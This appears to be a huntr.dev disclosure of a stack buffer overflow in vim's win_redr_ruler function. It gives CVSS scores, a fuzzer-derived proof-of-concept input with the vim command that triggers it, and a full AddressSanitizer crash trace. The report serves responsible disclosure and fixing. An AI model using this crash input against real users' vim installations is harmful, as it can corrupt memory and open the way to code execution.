Stack-based Buffer Overflow in function win_redr_ruler

2022-09-2511:48:11

janette88

www.huntr.dev

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

4.4 Medium

CVSS2

Access Vector

LOCAL

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:L/AC:M/Au:N/C:P/I:P/A:P

0.001 Low

EPSS

Percentile

28.3%

JSON

Description

Stack Buffer Overflow in function win_redr_ruler at drawscreen.c:799 .

vim version

git log
commit ec1238b4068d0d6d9d02ac1a8e61720224a1be73 (grafted, HEAD -&gt; master, tag: v9.0.0582, origin/master, origin/HEAD)

Proof of Concept

poc download url:
https://raw.githubusercontent.com/Janette88/vim/main/poc1_stack.txt

xxd -r &lt;  poc1_stack.txt | tee poc1_stack.dat
se encoding=iso8859
norm:se!r
wi0 0
no0 H
sil0norm0000000q:


./vim -u NONE -i NONE -n -m -X -Z -e -s -S /home/fuzz/test/poc1_stack.dat -c :qa!
  redrawtime=2000  regexpengine=0  report=2  rightleftcmd=search  rulerformat=  runtimepath=~/.vim,/usr/local/share/vim/vimfiles,/usr/local/share/vim,/usr/local/share/vim/vimfiles/after,~/.vim/after
=================================================================
==49463==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffff6c3b45e at pc 0x560f8d425425 bp 0x7ffff6c3b3b0 sp 0x7ffff6c3b3a0
WRITE of size 1 at 0x7ffff6c3b45e thread T0
    #0 0x560f8d425424 in win_redr_ruler /home/fuzz/vim/src/drawscreen.c:799
    #1 0x560f8d42384f in win_redr_status /home/fuzz/vim/src/drawscreen.c:551
    #2 0x560f8d4362a5 in redraw_statuslines /home/fuzz/vim/src/drawscreen.c:3300
    #3 0x560f8dae447a in main_loop /home/fuzz/vim/src/main.c:1425
    #4 0x560f8d536cf9 in open_cmdwin /home/fuzz/vim/src/ex_getln.c:4554
    #5 0x560f8d52b67e in getcmdline_int /home/fuzz/vim/src/ex_getln.c:1934
    #6 0x560f8d5294f0 in getcmdline /home/fuzz/vim/src/ex_getln.c:1554
    #7 0x560f8d52f605 in getexline /home/fuzz/vim/src/ex_getln.c:2846
    #8 0x560f8d4e12db in do_cmdline /home/fuzz/vim/src/ex_docmd.c:873
    #9 0x560f8d69aa55 in nv_colon /home/fuzz/vim/src/normal.c:3205
    #10 0x560f8d68dae3 in normal_cmd /home/fuzz/vim/src/normal.c:937
    #11 0x560f8d50ee23 in exec_normal /home/fuzz/vim/src/ex_docmd.c:8842
    #12 0x560f8d50ebe2 in exec_normal_cmd /home/fuzz/vim/src/ex_docmd.c:8805
    #13 0x560f8d50e486 in ex_normal /home/fuzz/vim/src/ex_docmd.c:8723
    #14 0x560f8d4ea8f1 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2569
    #15 0x560f8d4e1b4d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #16 0x560f8d807ac8 in do_source_ext /home/fuzz/vim/src/scriptfile.c:1667
    #17 0x560f8d808cfd in do_source /home/fuzz/vim/src/scriptfile.c:1811
    #18 0x560f8d8057bb in cmd_source /home/fuzz/vim/src/scriptfile.c:1163
    #19 0x560f8d805820 in ex_source /home/fuzz/vim/src/scriptfile.c:1189
    #20 0x560f8d4ea8f1 in do_one_cmd /home/fuzz/vim/src/ex_docmd.c:2569
    #21 0x560f8d4e1b4d in do_cmdline /home/fuzz/vim/src/ex_docmd.c:990
    #22 0x560f8d4dfee7 in do_cmdline_cmd /home/fuzz/vim/src/ex_docmd.c:584
    #23 0x560f8daea1fb in exe_commands /home/fuzz/vim/src/main.c:3139
    #24 0x560f8dae336e in vim_main2 /home/fuzz/vim/src/main.c:781
    #25 0x560f8dae2c26 in main /home/fuzz/vim/src/main.c:432
    #26 0x7fa526142082 in __libc_start_main ../csu/libc-start.c:308
    #27 0x560f8d35de4d in _start (/home/fuzz/vim/src/vim+0x13be4d)

Address 0x7ffff6c3b45e is located in stack of thread T0 at offset 78 in frame
    #0 0x560f8d424099 in win_redr_ruler /home/fuzz/vim/src/drawscreen.c:642

  This frame has 3 object(s):
    [48, 52) 'attr' (line 647)
    [64, 68) 'virtcol' (line 649)
    [80, 150) 'buffer' (line 644) &lt;== Memory access at offset 78 underflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow /home/fuzz/vim/src/drawscreen.c:799 in win_redr_ruler
Shadow bytes around the buggy address:
  0x10007ed7f630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10007ed7f640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10007ed7f650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10007ed7f660: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10007ed7f670: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=&gt;0x10007ed7f680: 00 00 f1 f1 f1 f1 f1 f1 04 f2 04[f2]00 00 00 00
  0x10007ed7f690: 00 00 00 00 06 f3 f3 f3 f3 f3 00 00 00 00 00 00
  0x10007ed7f6a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1
  0x10007ed7f6b0: f1 f1 04 f3 f3 f3 00 00 00 00 00 00 00 00 00 00
  0x10007ed7f6c0: 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 04 f2
  0x10007ed7f6d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==49463==ABORTING